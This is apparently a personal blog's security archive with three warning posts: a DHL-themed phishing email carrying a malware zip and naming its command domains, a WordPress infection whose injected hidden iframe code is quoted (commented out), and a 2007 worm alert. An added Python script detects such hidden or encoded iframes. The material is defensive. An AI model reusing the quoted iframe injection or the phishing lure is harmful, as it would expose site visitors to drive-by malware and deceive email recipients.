Archive for the 'Security' Category

DHL Print Label – MALWARE

Tuesday, October 27th, 2009

I recently received the following email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address. 

You may pickup the parcel at our post office personaly!

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox.

Thank you,
DHL Global Forwarding Services.

The attached file, DHL_print_label_cef3e.zip, contains malware; do not open or run it.

ThreatExpert behavioral analysis:
http://www.threatexpert.com/report.aspx?md5=8960322225b6a842bad87a285f028f5f

Anubis behavioral analysis:
http://anubis.iseclab.org/?action=result&task_id=1eddf69e4a1adce8441a785cef6c52879

See the Web of Trust (WOT) and MalwareURL reports for mmsfoundsystem.ru, a domain to which this malware phones home, and for a related domain, mmmserver.ru:

http://www.mywot.com/en/scorecard/mmsfoundsystem.ru
http://www.malwareurl.com/listing.php?domain=mmsfoundsystem.ru

http://www.mywot.com/en/scorecard/mmmserver.ru
http://www.malwareurl.com/listing.php?domain=mmmserver.ru

– 3Monkeys

HTML/FRAMER virus alert from AVG

Friday, July 17th, 2009

I found that the HTML/FRAMER virus had infected this site. It has been eradicated!

For those interested, the following code (commented out here for safety) was inserted into the main index (index.php) by some hacker. If you run a WordPress blog, I suggest you check your index.php file: the malicious code is appended at the end of index.php. Other forms of the virus encode the iframe attack.

<!-- <iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> -->
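A detector for this kind of injection, added here as an example and not part of the original post or of WordPress: it scans PHP/HTML/JS files for zero-size or hidden iframes, including ones wrapped in an HTML comment or percent-encoded inside document.write(unescape(...)). The sample file and the example.invalid domain are constructed.

```python
import re
from pathlib import Path

# Any <iframe ...> opening tag, including ones sitting inside an HTML comment.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attributes that make an iframe invisible: a width/height of 0, or a hidden style.
HIDDEN_RE = re.compile(
    r"\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s/>])"
    r"|style\s*=\s*[\"']?[^\"'>]*(?:hidden|display\s*:\s*none)",
    re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# Encoded variant: document.write(unescape("%3Ciframe ...")).
UNESCAPE_RE = re.compile(r"unescape\(\s*[\"']([^\"']+)[\"']\s*\)", re.IGNORECASE)

def percent_decode(s):
    """Decode %XX sequences the way JavaScript's unescape() does."""
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def find_hidden_iframes(text):
    """Return [(line_number, kind, src)] for every hidden iframe in text."""
    hits = []
    def line_of(pos):
        return text.count("\n", 0, pos) + 1
    for m in IFRAME_RE.finditer(text):                      # literal tags
        if HIDDEN_RE.search(m.group(0)):
            src = SRC_RE.search(m.group(0))
            hits.append((line_of(m.start()), "literal", src.group(1) if src else None))
    for m in UNESCAPE_RE.finditer(text):                    # percent-encoded tags
        for tag in IFRAME_RE.finditer(percent_decode(m.group(1))):
            if HIDDEN_RE.search(tag.group(0)):
                src = SRC_RE.search(tag.group(0))
                hits.append((line_of(m.start()), "encoded", src.group(1) if src else None))
    return hits

def scan_tree(root):
    """Scan every .php/.html/.htm/.js file under root; returns {path: hits}."""
    results = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in (".php", ".html", ".htm", ".js"):
            hits = find_hidden_iframes(p.read_text(errors="replace"))
            if hits:
                results[str(p)] = hits
    return results

# Constructed sample resembling an infected WordPress index.php (placeholder domain).
SAMPLE = """<?php get_header(); ?>
<!-- <iframe src="http://example.invalid/lib/index.php" width=0 height=0 style="hidden" frameborder=0></iframe> -->
<script>document.write(unescape("%3Ciframe src=%22http://example.invalid/x.php%22 width=0 height=0%3E%3C/iframe%3E"))</script>
"""
# Usage: find_hidden_iframes(SAMPLE), or scan_tree("/path/to/wordpress") on a real install.
```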

Alert: ‘Happy New Year’ Worm Gains Ground

Tuesday, January 2nd, 2007

Being a Linux user, I rarely have to worry about viruses, worms or spyware, though sometimes, as with the recent GMail hack, I do. Therefore, I subscribe to several computer-security-related RSS feeds, and this one scrolled by earlier today: ‘Happy New Year’ Worm Gains Ground.

InformationWeek reports:
The “Happy New Year” worm-carrying spam that first appeared last week accounted for 12% of all e-mail traffic over the weekend and continues to spread, antivirus vendors said Tuesday.

The worm, dubbed “Tibs” by Kaspersky Lab but also known as a “Nuwar” variant (Trend Micro) and “Mixor.q” (Symantec), appears as a file attachment named “postcard.exe” in messages with “Happy New Year” subject headings. Users who launch the executable will infect their PCs with rootkits, keyloggers, and other malware.

What is particularly interesting to me is the volume of traffic this is generating. 12% means that 1 out of every 8 emails is carrying this virus. So for those of you who have yet to make the switch to Linux, please beware and delete any email that exhibits the properties discussed in the article.

Until next time.

-3Monkeys